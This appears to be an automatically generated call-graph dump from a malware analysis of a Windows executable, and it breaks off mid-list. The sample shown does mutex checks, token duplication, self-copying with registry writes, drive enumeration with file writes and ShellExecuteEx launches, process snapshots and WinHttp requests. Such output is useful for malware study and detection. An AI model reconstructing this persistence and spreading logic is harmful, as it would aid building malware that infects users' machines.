DeleteCriticalSection 3726->3732 3727->3726 3728 ca2876 2 API calls 3728->3715 4240 ca39b7 3730->4240 3731->3732 4239 ca90a1 GetProcessHeap RtlFreeHeap 3732->4239 3737 ca2f6a 3740 ca2f79 3737->3740 3742 ca1870 2 API calls 3737->3742 3743 ca2f7f ReleaseMutex CloseHandle 3740->3743 3744 ca2f93 3740->3744 3742->3740 3743->3744 4252 ca6274 3744->4252 3749 ca5930 5 API calls 3750 ca2b54 3749->3750 3750->3710 3751 ca2b6e 3750->3751 3752 ca2be6 3750->3752 3753 ca4ea5 14 API calls 3751->3753 3941 ca4ea5 3752->3941 3755 ca2b75 3753->3755 3755->3710 3760 ca4f7a 16 API calls 3755->3760 3757 ca2c62 3759 ca2c98 3757->3759 3958 ca4f7a 3757->3958 3758 ca2bf1 3761 ca4f7a 16 API calls 3758->3761 4054 ca4dbe 3759->4054 3763 ca2b84 3760->3763 3765 ca2bf8 3761->3765 3767 ca2ba3 3763->3767 3772 ca2b8f 3763->3772 3765->3710 3769 ca2c1d 3765->3769 3776 ca2c10 3765->3776 3773 ca2bbf 3767->3773 3781 ca4dbe 28 API calls 3767->3781 3769->3710 3784 ca2c15 3769->3784 3770 ca2be0 3770->3759 3963 ca2946 3770->3963 3771 ca2c74 4177 ca489e 3771->4177 4114 ca49d3 3772->4114 3773->3770 3790 ca4dbe 28 API calls 3773->3790 3774 ca2ccc 4063 ca3c7a 3774->4063 3775 ca2cac 3780 ca3c7a 10 API calls 3775->3780 4147 ca242f CreateEventW 3776->4147 3788 ca2cbc 3780->3788 3781->3773 3784->3710 3784->3769 4158 ca4944 GetVersion 3784->4158 3795 ca1894 10 API calls 3788->3795 3789 ca2c7d Sleep 3789->3770 3790->3770 3794 ca2b98 Sleep 3794->3767 3799 ca2cc4 3795->3799 3796 ca2c38 3796->3710 3801 ca4f7a 16 API calls 3796->3801 3805 ca2c51 Sleep 3796->3805 3799->3710 4109 ca24c2 3799->4109 3800 ca3c7a 10 API calls 3802 ca2cf8 3800->3802 3801->3796 3803 ca1894 10 API calls 3802->3803 3803->3799 3805->3796 3807 ca2c5d 3805->3807 3806 ca2d24 3808 ca2e17 3806->3808 3809 ca2d47 CreateThread 3806->3809 3807->3710 3810 ca24c2 121 API calls 3808->3810 3811 ca2d6a 3809->3811 3812 ca2ed5 3809->3812 4943 ca239a 3809->4943 3814 ca2e02 3810->3814 3815 ca2d90 3811->3815 3817 ca24c2 121 API calls 3811->3817 3812->3710 3813 ca2edb CloseHandle 3812->3813 3813->3812 3819 ca2e4b 3814->3819 3820 ca2e3f WaitForSingleObject 3814->3820 3818 ca24c2 121 API calls 3815->3818 3817->3815 3821 ca2dbb 3818->3821 4191 ca5962 EnterCriticalSection LeaveCriticalSection 3819->4191 3820->3819 3823 ca24c2 121 API calls 3821->3823 3825 ca2de6 3823->3825 3824 ca2e54 3826 ca2e96 3824->3826 3832 ca2e69 3824->3832 4192 ca1000 3824->4192 3827 ca24c2 121 API calls 3825->3827 3828 ca2ebe 3826->3828 3829 ca2e9d EnterCriticalSection LeaveCriticalSection 3826->3829 3827->3814 3828->3812 3831 ca2ec2 WaitForMultipleObjects 3828->3831 3829->3828 3831->3812 3833 ca2946 18 API calls 3832->3833 3834 ca2e74 3832->3834 3833->3834 3834->3826 3835 ca4dbe 28 API calls 3834->3835 3835->3826 4260 ca9041 3836->4260 3838 ca62b1 3839 ca9041 2 API calls 3838->3839 3844 ca62f9 3838->3844 3840 ca62c5 3839->3840 3841 ca9041 2 API calls 3840->3841 3842 ca62d3 3841->3842 3843 ca6274 2 API calls 3842->3843 3842->3844 3843->3844 3844->3702 3846 ca636b 3845->3846 3848 ca6383 3845->3848 3847 ca9041 2 API calls 3846->3847 3846->3848 3847->3848 3848->3704 3850 ca287d 3849->3850 3851 ca2883 3849->3851 4263 ca90a1 GetProcessHeap RtlFreeHeap 3850->4263 3853 ca2891 3851->3853 4264 ca90a1 GetProcessHeap RtlFreeHeap 3851->4264 3855 ca289f 3853->3855 4265 ca90a1 GetProcessHeap RtlFreeHeap 3853->4265 3857 ca28ad 3855->3857 4266 ca90a1 GetProcessHeap RtlFreeHeap 3855->4266 3858 ca28bb 3857->3858 4267 ca90a1 GetProcessHeap RtlFreeHeap 3857->4267 3858->3709 3862 ca9041 2 API calls 3861->3862 3863 ca273d 3862->3863 3864 ca9041 2 API calls 3863->3864 3865 ca2748 3864->3865 3866 ca2836 3865->3866 3867 ca2843 3865->3867 4268 ca5b20 3865->4268 3866->3867 4287 ca90a1 GetProcessHeap RtlFreeHeap 3866->4287 3874 ca2851 3867->3874 4288 ca90a1 GetProcessHeap RtlFreeHeap 3867->4288 3872 ca2870 3872->3715 3872->3728 3873 ca2765 3873->3866 3877 ca278f CreateFileW 3873->3877 3875 ca285f 3874->3875 4289 ca90a1 GetProcessHeap RtlFreeHeap 3874->4289 3875->3872 4290 ca90a1 GetProcessHeap RtlFreeHeap 3875->4290 3877->3866 3878 ca27ad SetFilePointer 3877->3878 3879 ca9041 2 API calls 3878->3879 3880 ca27c2 3879->3880 3881 ca9041 2 API calls 3880->3881 3882 ca27cf 3881->3882 3883 ca282d CloseHandle 3882->3883 3884 ca27dd SetFilePointer 3882->3884 3883->3866 3884->3883 3885 ca27e9 ReadFile 3884->3885 3885->3883 3886 ca27ff 3885->3886 3886->3883 3887 ca2804 MultiByteToWideChar 3886->3887 4275 ca2504 3887->4275 3891 ca39e3 3890->3891 3892 ca2b07 3890->3892 3893 ca39b7 2 API calls 3891->3893 3894 ca3e39 GetVersion 3892->3894 3893->3892 3895 ca2b0d 3894->3895 3896 ca3e52 GetCurrentProcess OpenProcessToken 3894->3896 3900 ca3772 3895->3900 3897 ca3e87 3896->3897 3898 ca3e69 GetTokenInformation 3896->3898 3897->3895 3899 ca3e90 FindCloseChangeNotification 3897->3899 3898->3897 3899->3895 3901 ca9041 2 API calls 3900->3901 3902 ca377f 3901->3902 3903 ca9041 2 API calls 3902->3903 3904 ca378c 3903->3904 3905 ca9041 2 API calls 3904->3905 3906 ca3794 3905->3906 3907 ca3827 3906->3907 3908 ca37a1 InitializeCriticalSectionAndSpinCount 3906->3908 3911 ca3835 3907->3911 4319 ca90a1 GetProcessHeap RtlFreeHeap 3907->4319 3909 ca37b7 3908->3909 3910 ca37b1 3908->3910 3914 ca37d3 3909->3914 3915 ca37c0 AllocConsole GetStdHandle 3909->3915 4318 ca90a1 GetProcessHeap RtlFreeHeap 3910->4318 3916 ca2b27 3911->3916 4320 ca90a1 GetProcessHeap RtlFreeHeap 3911->4320 3914->3907 3918 ca5b20 5 API calls 3914->3918 3915->3914 3916->3710 3921 ca28ca 3916->3921 3919 ca37eb 3918->3919 3919->3907 3920 ca380d CreateFileW 3919->3920 3920->3907 3922 ca3c7a 10 API calls 3921->3922 3923 ca28d8 3922->3923 3924 ca6347 2 API calls 3923->3924 3925 ca28e4 3924->3925 3933 ca292e 3925->3933 4321 ca5fe7 3925->4321 3927 ca39da 2 API calls 3929 ca2939 3927->3929 3930 ca39da 2 API calls 3929->3930 3931 ca2940 3930->3931 3934 ca5930 3931->3934 3933->3927 3935 ca9041 2 API calls 3934->3935 3936 ca5938 3935->3936 3937 ca2b43 3936->3937 3938 ca593f InitializeCriticalSectionAndSpinCount 3936->3938 3937->3712 3937->3749 3938->3937 3939 ca5955 3938->3939 4360 ca90a1 GetProcessHeap RtlFreeHeap 3939->4360 3942 ca3c7a 10 API calls 3941->3942 3943 ca4eb4 3942->3943 3944 ca6347 2 API calls 3943->3944 3945 ca4ebe 3944->3945 3946 ca5fe7 6 API calls 3945->3946 3947 ca4f0b 3946->3947 3948 ca4f17 OpenMutexW 3947->3948 3951 ca4f4b 3947->3951 3949 ca4f2a CreateMutexW 3948->3949 3950 ca4f39 WaitForSingleObject 3948->3950 3949->3950 3952 ca4f60 3949->3952 3950->3951 3950->3952 3951->3952 3953 ca4f55 CloseHandle 3951->3953 3954 ca39da 2 API calls 3952->3954 3953->3952 3955 ca4f6a 3954->3955 3956 ca39da 2 API calls 3955->3956 3957 ca2bec 3956->3957 3957->3757 3957->3758 3959 ca4ea5 14 API calls 3958->3959 3960 ca4f8b 3959->3960 3961 ca4f92 ReleaseMutex CloseHandle 3960->3961 3962 ca2c6f 3960->3962 3961->3962 3962->3770 3962->3771 3964 ca3c7a 10 API calls 3963->3964 3965 ca2954 3964->3965 3966 ca6347 2 API calls 3965->3966 3967 ca2960 3966->3967 3968 ca6347 2 API calls 3967->3968 3969 ca296b 3968->3969 3970 ca6347 2 API calls 3969->3970 3971 ca2976 3970->3971 3982 ca29cb 3971->3982 4365 ca620d 3971->4365 3973 ca39da 2 API calls 3974 ca29d6 3973->3974 3975 ca39da 2 API calls 3974->3975 3976 ca29df 3975->3976 4361 ca39f9 3976->4361 3978 ca29af 3978->3982 4372 ca3cbd WinHttpOpen 3978->4372 3981 ca39f9 2 API calls 3983 ca29ef 3981->3983 3982->3973 3984 ca1236 3983->3984 3985 ca6347 2 API calls 3984->3985 3986 ca124c 3985->3986 4387 ca3bb3 3986->4387 3989 ca3bb3 9 API calls 3990 ca1263 3989->3990 3991 ca3bb3 9 API calls 3990->3991 3992 ca126e 3991->3992 3993 ca9041 2 API calls 3992->3993 3994 ca127d 3993->3994 3995 ca9041 2 API calls 3994->3995 3996 ca1287 3995->3996 3997 ca9041 2 API calls 3996->3997 3998 ca1291 3997->3998 3999 ca9041 2 API calls 3998->3999 4000 ca129b 3999->4000 4001 ca9041 2 API calls 4000->4001 4002 ca12a4 4001->4002 4003 ca9041 2 API calls 4002->4003 4004 ca12ae 4003->4004 4005 ca1506 4004->4005 4401 ca5b0e GetModuleFileNameW 4004->4401 4006 ca39da 2 API calls 4005->4006 4007 ca150f 4006->4007 4009 ca39da 2 API calls 4007->4009 4010 ca1518 4009->4010 4011 ca39da 2 API calls 4010->4011 4012 ca1521 4011->4012 4014 ca39da 2 API calls 4012->4014 4013 ca12ce 4013->4005 4015 ca5b20 5 API calls 4013->4015 4016 ca152a 4014->4016 4022 ca12f1 4015->4022 4017 ca39da 2 API calls 4016->4017 4018 ca1531 4017->4018 4019 ca39da 2 API calls 4018->4019 4020 ca153a 4019->4020 4021 ca39da 2 API calls 4020->4021 4023 ca1543 4021->4023 4022->4005 4402 ca5b7c 4022->4402 4025 ca39da 2 API calls 4023->4025 4027 ca154c 4025->4027 4028 ca39da 2 API calls 4027->4028 4029 ca1555 4028->4029 4031 ca39da 2 API calls 4029->4031 4030 ca5b7c 5 API calls 4032 ca1353 4030->4032 4033 ca155e 4031->4033 4032->4005 4034 ca1378 CopyFileW 4032->4034 4033->3759 4035 ca138c 4034->4035 4036 ca1461 4034->4036 4037 ca1392 RegOpenKeyExW 4035->4037 4036->4005 4038 ca35d2 4 API calls 4036->4038 4039 ca13c2 4037->4039 4040 ca13b3 4037->4040 4051 ca1477 4038->4051 4042 ca13d8 RegOpenKeyExW 4039->4042 4409 ca3a93 RegSetValueExW RegCloseKey 4040->4409 4043 ca13f9 4042->4043 4047 ca1408 4042->4047 4410 ca3a93 RegSetValueExW RegCloseKey 4043->4410 4044 ca14fe 4411 ca90a1 GetProcessHeap RtlFreeHeap 4044->4411 4047->4036 4049 ca143e CopyFileW GetFileAttributesW 4047->4049 4048 ca14a2 CopyFileW 4048->4051 4049->4036 4050 ca1456 SetFileAttributesW 4049->4050 4050->4036 4051->4005 4051->4044 4051->4048 4052 ca14c5 CopyFileW GetFileAttributesW 4051->4052 4052->4051 4053 ca14dd SetFileAttributesW 4052->4053 4053->4051 4055 ca6347 2 API calls 4054->4055 4056 ca4dcf 4055->4056 4057 ca2c9f 4056->4057 4058 ca4dd7 4056->4058 4057->3774 4057->3775 4427 ca4d68 4058->4427 4061 ca39f9 2 API calls 4062 ca4de6 4061->4062 4062->4057 4064 ca3bb3 9 API calls 4063->4064 4065 ca3c8d 4064->4065 4066 ca3c9e GetVolumeInformationW 4065->4066 4067 ca3cac 4066->4067 4068 ca39da 2 API calls 4067->4068 4069 ca2cdc 4068->4069 4070 ca1894 4069->4070 4071 ca9041 2 API calls 4070->4071 4072 ca18a4 4071->4072 4073 ca6347 2 API calls 4072->4073 4074 ca18b3 4073->4074 4075 ca6347 2 API calls 4074->4075 4076 ca18be 4075->4076 4077 ca6347 2 API calls 4076->4077 4078 ca18c9 4077->4078 4079 ca6347 2 API calls 4078->4079 4089 ca18da 4079->4089 4080 ca39b7 2 API calls 4081 ca1a28 4080->4081 4082 ca39da 2 API calls 4081->4082 4084 ca1a30 4082->4084 4083 ca1870 2 API calls 4108 ca19ef 4083->4108 4085 ca39da 2 API calls 4084->4085 4086 ca1a3b 4085->4086 4087 ca39da 2 API calls 4086->4087 4088 ca1a44 4087->4088 4090 ca1a52 4088->4090 4512 ca90a1 GetProcessHeap RtlFreeHeap 4088->4512 4091 ca5fe7 6 API calls 4089->4091 4107 ca19e5 4089->4107 4089->4108 4094 ca1a60 4090->4094 4513 ca90a1 GetProcessHeap RtlFreeHeap 4090->4513 4093 ca1947 4091->4093 4098 ca35d2 4 API calls 4093->4098 4093->4107 4096 ca1a6e 4094->4096 4514 ca90a1 GetProcessHeap RtlFreeHeap 4094->4514 4096->3800 4099 ca1960 4098->4099 4100 ca35d2 4 API calls 4099->4100 4099->4107 4101 ca1975 4100->4101 4102 ca1991 4101->4102 4103 ca35d2 4 API calls 4101->4103 4101->4107 4104 ca35d2 4 API calls 4102->4104 4105 ca19a6 4102->4105 4102->4107 4103->4102 4104->4105 4105->4107 4473 ca15a6 4105->4473 4107->4083 4107->4108 4108->4080 4110 ca9041 2 API calls 4109->4110 4111 ca24cc 4110->4111 4112 ca24d3 CreateThread 4111->4112 4113 ca2500 4111->4113 4112->3806 4540 ca22ee 4112->4540 4565 ca2161 4112->4565 4596 ca1a76 GetLogicalDrives 4112->4596 4623 ca1cc5 GetLogicalDrives 4112->4623 4113->3806 4115 ca6347 2 API calls 4114->4115 4116 ca49ef 4115->4116 4117 ca9041 2 API calls 4116->4117 4118 ca4a0b GetVersion 4117->4118 4119 ca4a39 4118->4119 4120 ca4b3a 4119->4120 4121 ca3d4b 6 API calls 4119->4121 4122 ca4b3f CloseHandle 4120->4122 4123 ca4b44 4120->4123 4124 ca4a6b GetModuleHandleA GetProcAddress 4121->4124 4122->4123 4125 ca4b49 CloseHandle 4123->4125 4126 ca4b4e 4123->4126 4130 ca4a89 4124->4130 4146 ca4b08 4124->4146 4125->4126 4127 ca4b58 4126->4127 4128 ca4b53 CloseHandle 4126->4128 4131 ca4b5d CloseHandle 4127->4131 4132 ca4b62 4127->4132 4128->4127 4129 ca3d4b 6 API calls 4134 ca4b2e 4129->4134 4130->4146 4785 ca5b0e GetModuleFileNameW 4130->4785 4131->4132 4133 ca4b6f 4132->4133 4786 ca90a1 GetProcessHeap RtlFreeHeap 4132->4786 4137 ca39b7 2 API calls 4133->4137 4134->4120 4138 ca4b35 CloseHandle 4134->4138 4140 ca2b94 4137->4140 4138->4120 4139 ca4a9a 4141 ca4aa3 GetShellWindow 4139->4141 4139->4146 4140->3767 4140->3794 4142 ca4aad GetWindowThreadProcessId 4141->4142 4141->4146 4143 ca4abc OpenProcess 4142->4143 4142->4146 4144 ca4ad2 OpenProcessToken 4143->4144 4143->4146 4145 ca4ae7 DuplicateTokenEx 4144->4145 4144->4146 4145->4146 4146->4129 4148 ca24ba 4147->4148 4149 ca2450 CreateThread 4147->4149 4148->3784 4150 ca2463 4149->4150 4787 ca454b 4149->4787 4151 ca4f7a 16 API calls 4150->4151 4152 ca2470 Sleep 4150->4152 4153 ca247c SetEvent WaitForSingleObject 4150->4153 4151->4150 4152->4150 4152->4153 4155 ca24aa CloseHandle 4153->4155 4156 ca249f GetExitCodeThread 4153->4156 4155->4148 4157 ca24b7 CloseHandle 4155->4157 4156->4155 4157->4148 4159 ca6347 2 API calls 4158->4159 4160 ca4962 4159->4160 4161 ca9041 2 API calls 4160->4161 4162 ca496e 4161->4162 4163 ca4428 13 API calls 4162->4163 4173 ca49b7 4162->4173 4165 ca497d 4163->4165 4164 ca49c3 4167 ca39da 2 API calls 4164->4167 4169 ca3d4b 6 API calls 4165->4169 4165->4173 4168 ca49ca 4167->4168 4168->3796 4170 ca498c 4169->4170 4171 ca49a8 4170->4171 4923 ca5b0e GetModuleFileNameW 4170->4923 4172 ca3d4b 6 API calls 4171->4172 4172->4173 4173->4164 4924 ca90a1 GetProcessHeap RtlFreeHeap 4173->4924 4175 ca499c 4175->4171 4176 ca3e9e ShellExecuteExW 4175->4176 4176->4171 4178 ca9041 2 API calls 4177->4178 4179 ca48b6 4178->4179 4180 ca3d4b 6 API calls 4179->4180 4181 ca48e0 4180->4181 4182 ca4925 4181->4182 4925 ca5b0e GetModuleFileNameW 4181->4925 4183 ca3d4b 6 API calls 4182->4183 4186 ca492f 4183->4186 4185 ca48ec 4185->4182 4187 ca48f1 CreateProcessW 4185->4187 4190 ca2c79 4186->4190 4926 ca90a1 GetProcessHeap RtlFreeHeap 4186->4926 4187->4182 4188 ca4915 CloseHandle CloseHandle 4187->4188 4188->4182 4190->3770 4190->3789 4191->3824 4193 ca3c7a 10 API calls 4192->4193 4194 ca1013 GetLogicalDrives 4193->4194 4195 ca3bb3 9 API calls 4194->4195 4196 ca1024 4195->4196 4197 ca6347 2 API calls 4196->4197 4198 ca1030 4197->4198 4199 ca6347 2 API calls 4198->4199 4200 ca103b 4199->4200 4201 ca6347 2 API calls 4200->4201 4202 ca1046 4201->4202 4203 ca6347 2 API calls 4202->4203 4204 ca1054 4203->4204 4205 ca9041 2 API calls 4204->4205 4206 ca1061 4205->4206 4927 ca3c29 4206->4927 4209 ca3c29 6 API calls 4210 ca108e 4209->4210 4211 ca11d0 4210->4211 4213 ca35d2 4 API calls 4210->4213 4218 ca10af 4210->4218 4212 ca39da 2 API calls 4211->4212 4214 ca11db 4212->4214 4213->4218 4215 ca39da 2 API calls 4214->4215 4216 ca11e4 4215->4216 4217 ca39da 2 API calls 4216->4217 4219 ca11ed 4217->4219 4221 ca35d2 4 API calls 4218->4221 4228 ca10ef 4218->4228 4220 ca39da 2 API calls 4219->4220 4222 ca11f6 4220->4222 4221->4218 4223 ca39da 2 API calls 4222->4223 4224 ca11fd 4223->4224 4225 ca39f9 2 API calls 4224->4225 4226 ca1206 4225->4226 4227 ca39f9 2 API calls 4226->4227 4229 ca120f 4227->4229 4228->4211 4232 ca3969 CreateFileW WriteFile CloseHandle 4228->4232 4235 ca3e9e ShellExecuteExW 4228->4235 4230 ca121e 4229->4230 4934 ca90a1 GetProcessHeap RtlFreeHeap 4229->4934 4231 ca122d 4230->4231 4935 ca90a1 GetProcessHeap RtlFreeHeap 4230->4935 4231->3832 4232->4228 4235->4228 4936 ca90a1 GetProcessHeap RtlFreeHeap 4236->4936 4238 ca5996 4238->3712 4239->3722 4241 ca2f59 4240->4241 4242 ca39c0 4240->4242 4241->3737 4244 ca1870 4241->4244 4937 ca90a1 GetProcessHeap RtlFreeHeap 4242->4937 4245 ca187d 4244->4245 4246 ca1877 4244->4246 4248 ca188b 4245->4248 4249 ca1567 2 API calls 4245->4249 4938 ca90a1 GetProcessHeap RtlFreeHeap 4246->4938 4939 ca90a1 GetProcessHeap RtlFreeHeap 4248->4939 4249->4248 4251 ca1891 4251->3737 4253 ca627a 4252->4253 4254 ca6280 4252->4254 4940 ca90a1 GetProcessHeap RtlFreeHeap 4253->4940 4256 ca628e 4254->4256 4941 ca90a1 GetProcessHeap RtlFreeHeap 4254->4941 4942 ca90a1 GetProcessHeap RtlFreeHeap 4256->4942 4259 ca62a2 4259->3699 4261 ca904a GetProcessHeap RtlAllocateHeap 4260->4261 4262 ca9049 4260->4262 4261->3838 4262->4261 4263->3851 4264->3853 4265->3855 4266->3857 4267->3858 4269 ca9041 2 API calls 4268->4269 4270 ca5b2e 4269->4270 4271 ca5b76 4270->4271 4291 ca5b0e GetModuleFileNameW 4270->4291 4271->3873 4274 ca5b3b 4292 ca90a1 GetProcessHeap RtlFreeHeap 4274->4292 4276 ca2519 4275->4276 4293 ca92e1 4276->4293 4278 ca2523 4279 ca9041 2 API calls 4278->4279 4280 ca2532 4279->4280 4281 ca25cb 4280->4281 4297 ca25f3 4280->4297 4283 ca25d5 4281->4283 4306 ca90a1 GetProcessHeap RtlFreeHeap 4281->4306 4285 ca25e7 4283->4285 4307 ca90a1 GetProcessHeap RtlFreeHeap 4283->4307 4285->3883 4287->3867 4288->3874 4289->3875 4290->3872 4291->4274 4292->4271 4294 ca92ea 4293->4294 4296 ca92f9 4293->4296 4295 ca905b 2 API calls 4294->4295 4295->4296 4296->4278 4300 ca2607 4297->4300 4305 ca2600 4297->4305 4298 ca2685 4301 ca92e1 2 API calls 4298->4301 4298->4305 4299 ca261d 4299->4305 4308 ca35d2 4299->4308 4300->4298 4300->4299 4300->4305 4303 ca2690 4301->4303 4304 ca9041 2 API calls 4303->4304 4304->4305 4305->4280 4306->4283 4307->4285 4309 ca35e9 4308->4309 4314 ca3612 4308->4314 4310 ca3617 4309->4310 4311 ca35f6 4309->4311 4309->4314 4312 ca9041 2 API calls 4310->4312 4315 ca907a 4311->4315 4312->4314 4314->4305 4316 ca9089 GetProcessHeap HeapReAlloc 4315->4316 4317 ca9081 4315->4317 4316->4314 4317->4316 4318->3909 4319->3911 4320->3916 4322 ca92e1 2 API calls 4321->4322 4327 ca5ff4 4322->4327 4323 ca291c 4323->3933 4328 ca3940 4323->4328 4324 ca907a 2 API calls 4324->4327 4325 ca6055 4331 ca90a1 GetProcessHeap RtlFreeHeap 4325->4331 4327->4323 4327->4324 4327->4325 4332 ca38da 4328->4332 4331->4323 4333 ca38ea 4332->4333 4334 ca38f0 EnterCriticalSection 4332->4334 4333->4334 4335 ca3939 4333->4335 4336 ca38fd 4334->4336 4338 ca3915 4334->4338 4335->3933 4347 ca2fb5 4336->4347 4339 ca3927 4338->4339 4341 ca3848 7 API calls 4338->4341 4342 ca3848 7 API calls 4339->4342 4341->4338 4344 ca3931 LeaveCriticalSection 4342->4344 4344->4335 4346 ca39da 2 API calls 4346->4338 4348 ca6347 2 API calls 4347->4348 4349 ca2fc3 4348->4349 4350 ca3848 4349->4350 4351 ca385d 4350->4351 4352 ca3887 4351->4352 4354 ca3876 WriteConsoleW 4351->4354 4353 ca38d2 4352->4353 4355 ca9041 2 API calls 4352->4355 4353->4346 4354->4352 4356 ca3897 4355->4356 4356->4353 4357 ca389e WideCharToMultiByte WriteFile 4356->4357 4359 ca90a1 GetProcessHeap RtlFreeHeap 4357->4359 4359->4353 4360->3937 4362 ca3a02 4361->4362 4363 ca29e8 4361->4363 4364 ca39b7 2 API calls 4362->4364 4363->3981 4364->4363 4381 ca930f 4365->4381 4367 ca6263 4367->3978 4368 ca907a 2 API calls 4369 ca6219 4368->4369 4369->4367 4369->4368 4370 ca6265 4369->4370 4386 ca90a1 GetProcessHeap RtlFreeHeap 4370->4386 4373 ca3ce0 WinHttpConnect 4372->4373 4374 ca3d45 4372->4374 4375 ca3cfa WinHttpOpenRequest 4373->4375 4376 ca3d3f WinHttpCloseHandle 4373->4376 4374->3982 4377 ca3d39 WinHttpCloseHandle 4375->4377 4378 ca3d14 WinHttpSendRequest 4375->4378 4376->4374 4377->4376 4379 ca3d2b WinHttpReceiveResponse 4378->4379 4380 ca3d36 WinHttpCloseHandle 4378->4380 4379->4380 4380->4377 4382 ca9318 4381->4382 4383 ca931c 4381->4383 4382->4369 4384 ca9041 2 API calls 4383->4384 4385 ca932a 4384->4385 4385->4369 4386->4367 4388 ca2fb5 2 API calls 4387->4388 4389 ca3bc3 4388->4389 4390 ca92e1 2 API calls 4389->4390 4393 ca3bcd 4390->4393 4391 ca39da 2 API calls 4392 ca1256 4391->4392 4392->3989 4400 ca3c0e 4393->4400 4412 ca3b33 4393->4412 4395 ca907a 2 API calls 4396 ca3be3 4395->4396 4396->4395 4397 ca3c10 4396->4397 4398 ca3b33 5 API calls 4396->4398 4396->4400 4423 ca90a1 GetProcessHeap RtlFreeHeap 4397->4423 4398->4396 4400->4391 4401->4013 4403 ca9041 2 API calls 4402->4403 4404 ca5b8a 4403->4404 4405 ca1335 4404->4405 4425 ca5b0e GetModuleFileNameW 4404->4425 4405->4005 4405->4030 4408 ca5b97 4426 ca90a1 GetProcessHeap RtlFreeHeap 4408->4426 4409->4039 4410->4047 4411->4005 4413 ca9041 2 API calls 4412->4413 4414 ca3b47 4413->4414 4415 ca6347 2 API calls 4414->4415 4416 ca3b54 4415->4416 4417 ca39da 2 API calls 4416->4417 4418 ca3b70 4417->4418 4419 ca3b79 ExpandEnvironmentStringsW 4418->4419 4420 ca3b8d 4418->4420 4419->4420 4424 ca90a1 GetProcessHeap RtlFreeHeap 4420->4424 4422 ca3bab 4422->4396 4423->4400 4424->4422 4425->4408 4426->4405 4428 ca930f 2 API calls 4427->4428 4429 ca4d7a 4428->4429 4430 ca4db7 4429->4430 4431 ca4d7f CreateThread 4429->4431 4430->4061 4431->4430 4432 ca4d96 WaitForSingleObject 4431->4432 4435 ca4b85 4431->4435 4433 ca4da2 GetExitCodeThread 4432->4433 4434 ca4db0 CloseHandle 4432->4434 4433->4434 4434->4430 4436 ca3bb3 9 API calls 4435->4436 4437 ca4ba5 4436->4437 4464 ca3d4b 4437->4464 4440 ca4cf1 4442 ca4d09 4440->4442 4443 ca4d03 CloseHandle 4440->4443 4441 ca4c27 CreatePipe 4441->4440 4444 ca4c41 SetHandleInformation 4441->4444 4445 ca4d0f CloseHandle 4442->4445 4446 ca4d15 4442->4446 4443->4442 4444->4440 4447 ca4c57 SetHandleInformation 4444->4447 4445->4446 4449 ca4d1e CloseHandle 4446->4449 4450 ca4d24 4446->4450 4447->4440 4448 ca4c67 CreateProcessW 4447->4448 4448->4440 4451 ca4cbd 4448->4451 4449->4450 4452 ca4d2a CloseHandle 4450->4452 4453 ca4d30 4450->4453 4458 ca4ccb WriteFile WaitForSingleObject 4451->4458 4452->4453 4454 ca4d3c 4453->4454 4455 ca4d36 CloseHandle 4453->4455 4456 ca4d48 4454->4456 4457 ca4d42 CloseHandle 4454->4457 4455->4454 4459 ca39da 2 API calls 4456->4459 4457->4456 4460 ca3d4b 6 API calls 4458->4460 4461 ca4d51 4459->4461 4460->4440 4462 ca39f9 2 API calls 4461->4462 4463 ca4d5a 4462->4463 4465 ca6347 2 API calls 4464->4465 4466 ca3d5f 4465->4466 4467 ca3d8b GetModuleHandleA 4466->4467 4468 ca3d96 GetProcAddress 4467->4468 4472 ca3dab 4467->4472 4468->4472 4469 ca39b7 2 API calls 4470 ca3db9 CreatePipe 4469->4470 4470->4440 4470->4441 4472->4469 4474 ca9041 2 API calls 4473->4474 4475 ca15b6 4474->4475 4476 ca9041 2 API calls 4475->4476 4477 ca15c4 4476->4477 4478 ca6347 2 API calls 4477->4478 4479 ca15d1 4478->4479 4480 ca3bb3 9 API calls 4479->4480 4481 ca15db 4480->4481 4482 ca3bb3 9 API calls 4481->4482 4483 ca15e8 4482->4483 4484 ca16d7 4483->4484 4487 ca5b7c 5 API calls 4483->4487 4511 ca16c8 4483->4511 4486 ca16e3 4484->4486 4534 ca90a1 GetProcessHeap RtlFreeHeap 4484->4534 4489 ca39da 2 API calls 4486->4489 4490 ca1610 4487->4490 4491 ca16ec 4489->4491 4492 ca1627 4490->4492 4515 ca3698 4490->4515 4493 ca39da 2 API calls 4491->4493 4496 ca35d2 4 API calls 4492->4496 4498 ca1641 4492->4498 4492->4511 4495 ca16f5 4493->4495 4497 ca39da 2 API calls 4495->4497 4496->4498 4502 ca16fe 4497->4502 4499 ca3698 4 API calls 4498->4499 4500 ca165b 4498->4500 4498->4511 4499->4500 4501 ca1671 4500->4501 4504 ca35d2 4 API calls 4500->4504 4500->4511 4503 ca1687 4501->4503 4505 ca3698 4 API calls 4501->4505 4501->4511 4502->4107 4506 ca169d 4503->4506 4507 ca35d2 4 API calls 4503->4507 4503->4511 4504->4501 4505->4503 4508 ca16b2 4506->4508 4509 ca35d2 4 API calls 4506->4509 4506->4511 4507->4506 4508->4484 4510 ca3698 4 API calls 4508->4510 4508->4511 4509->4508 4510->4511 4511->4484 4522 ca1567 4511->4522 4512->4090 4513->4094 4514->4096 4516 ca36ab 4515->4516 4520 ca36d3 4515->4520 4517 ca36bc 4516->4517 4518 ca36d6 4516->4518 4516->4520 4521 ca907a 2 API calls 4517->4521 4519 ca9041 2 API calls 4518->4519 4519->4520 4520->4492 4521->4520 4523 ca156d 4522->4523 4524 ca1573 4522->4524 4535 ca90a1 GetProcessHeap RtlFreeHeap 4523->4535 4526 ca1581 4524->4526 4536 ca90a1 GetProcessHeap RtlFreeHeap 4524->4536 4528 ca158f 4526->4528 4537 ca90a1 GetProcessHeap RtlFreeHeap 4526->4537 4532 ca159d 4528->4532 4538 ca90a1 GetProcessHeap RtlFreeHeap 4528->4538 4539 ca90a1 GetProcessHeap RtlFreeHeap 4532->4539 4533 ca15a4 4533->4484 4534->4486 4535->4524 4536->4526 4537->4528 4538->4532 4539->4533 4541 ca6347 2 API calls 4540->4541 4542 ca2300 4541->4542 4543 ca6347 2 API calls 4542->4543 4544 ca230b 4543->4544 4649 ca3955 4544->4649 4546 ca2332 4549 ca237b 4546->4549 4551 ca35d2 4 API calls 4546->4551 4552 ca3955 9 API calls 4549->4552 4560 ca2344 4551->4560 4554 ca2387 4552->4554 4553 ca39da 2 API calls 4553->4546 4670 ca90a1 GetProcessHeap RtlFreeHeap 4554->4670 4555 ca2372 4557 ca39da 2 API calls 4555->4557 4557->4549 4558 ca2390 4560->4555 4561 ca236d 4560->4561 4658 ca4dee CreateToolhelp32Snapshot 4560->4658 4668 ca5962 EnterCriticalSection LeaveCriticalSection 4560->4668 4669 